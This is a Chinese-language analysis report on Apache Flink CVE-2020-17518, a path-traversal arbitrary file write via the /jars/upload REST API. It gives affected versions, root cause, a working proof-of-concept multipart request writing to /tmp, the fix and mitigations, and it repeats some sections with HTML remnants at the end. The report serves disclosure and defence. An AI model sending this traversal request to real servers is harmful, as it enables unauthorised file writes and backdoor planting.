Apache Flink 任意文件写入漏洞(CVE-2020-17518)分析报告<\/h1>

1. 漏洞概述<\/h2>
漏洞名称<\/strong>: Apache Flink 目录遍历攻击：通过REST API实现远程文件写入
CVE编号<\/strong>: CVE-2020-17518
影响版本<\/strong>: Apache Flink 1.5.1 至 1.11.2
漏洞类型<\/strong>: 任意文件写入
漏洞危害<\/strong>: 攻击者可通过REST API上传恶意文件到Flink服务器的任意位置
修复版本<\/strong>: 1.11.3 或 1.12.0<\/p>

2. Apache Flink简介<\/h2>
Apache Flink是一个框架和分布式处理引擎，用于对无边界和有边界的数据流进行有状态的计算。Flink被设计成可在所有常见的集群环境中运行，以"内存速度"执行计算。<\/p>
3. 漏洞背景<\/h2>
Flink提供了REST API用于监控和管理集群，其中包括一个\/jars\/upload<\/code>接口用于上传JAR文件到集群。该接口本应只允许上传JAR文件到指定目录，但由于路径处理不当，导致可以写入任意文件到任意位置。<\/p>
4. 漏洞细节<\/h2> 4.1 漏洞原理<\/h3> 在受影响版本中，FileUploadHandler.java<\/code>处理上传文件时，直接使用currentUploadDir.resolve(fileUpload.getFilename())<\/code>来构造目标路径，没有对文件名进行规范化处理，导致可以通过..\/..\/<\/code>等路径遍历符号将文件写入任意位置。<\/p> 4.2 漏洞验证<\/h3> 攻击请求示例<\/strong>:<\/p> POST<\/span> \/jars\/upload HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target:8081<\/span> <\/span><\/span>Accept:<\/span> *\/*<\/span> <\/span><\/span>Content-Length:<\/span> 240<\/span> <\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=------------------------23ef1e5684ec1135<\/span> <\/span><\/span>Connection:<\/span> close<\/span> <\/span><\/span> <\/span><\/span>--------------------------23ef1e5684ec1135 <\/span><\/span>Content-Disposition: form-data; name="jarfile"; filename="..\/..\/..\/..\/..\/..\/tmp\/test.txt" <\/span><\/span>Content-Type: application\/octet-stream <\/span><\/span> <\/span><\/span>#test_content <\/span><\/span> <\/span><\/span>--------------------------23ef1e5684ec1135-- <\/span><\/span><\/code><\/pre>响应示例<\/strong>: 虽然服务器返回400错误，但文件已成功写入指定位置。<\/p> 4.3 漏洞修复<\/h3> 修复提交: a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4 修复方式: 使用new File(fileUpload.getFilename()).getName()<\/code>获取文件名，去除路径信息。<\/p> 修复后的关键代码:<\/p> final<\/span> Path dest =<\/span> currentUploadDir.<\/span>resolve<\/span>(<\/span>new<\/span> File(<\/span>fileUpload.<\/span>getFilename<\/span>()).<\/span>getName<\/span>());<\/span> <\/span><\/span><\/code><\/pre>5. 影响评估<\/h2> 5.1 受影响版本<\/h3> 1.5.1 ≤ 受影响版本 ≤ 1.11.2<\/li> <\/ul> 5.2 潜在危害<\/h3> 写入恶意文件到系统关键位置<\/li> 覆盖重要配置文件<\/li> 植入后门程序<\/li> 导致系统拒绝服务<\/li> <\/ul> 6. 修复建议<\/h2> 升级到安全版本<\/strong>:<\/p> 升级到1.11.3或1.12.0及以上版本<\/li> <\/ul> <\/li> 临时缓解措施<\/strong>:<\/p> 限制对Flink REST API的访问<\/li> 使用网络防火墙规则限制访问源<\/li> <\/ul> <\/li> 安全配置<\/strong>:<\/p> 确保Flink运行在最小权限账户下<\/li> 定期审计系统文件完整性<\/li> <\/ul> <\/li> <\/ol> 7. 漏洞分析总结<\/h2> 该漏洞源于Flink在处理上传文件时未对路径进行规范化处理，导致目录遍历攻击成为可能。虽然服务器会返回错误响应，但文件写入操作已经完成。修复方案简单有效，通过Java File类自动去除路径信息，仅保留文件名部分。<\/p> 8. 参考资源<\/h2> 官方漏洞公告: https:\/\/lists.apache.org\/thread.html\/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261%40%3Cdev.flink.apache.org%3E<\/li> 修复提交: https:\/\/github.com\/apache\/flink\/commit\/a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4<\/li> Apache Flink官方文档: https:\/\/flink.apache.org\/<\/li> <\/ol>

Apache Flink 任意文件写入漏洞(CVE-2020-17518)分析报告<\/h1>

3. 漏洞背景<\/h2> Flink提供了REST API用于监控和管理集群，其中包括一个\/jars\/upload<\/code>接口用于上传JAR文件到集群。该接口本应只允许上传JAR文件到指定目录，但由于路径处理不当，导致可以写入任意文件到任意位置。<\/p>

5. 影响评估<\/h2>

3. 漏洞背景<\/h2>
Flink提供了REST API用于监控和管理集群，其中包括一个`\/jars\/upload<\/code>接口用于上传JAR文件到集群。该接口本应只允许上传JAR文件到指定目录，但由于路径处理不当，导致可以写入任意文件到任意位置。<\/p>`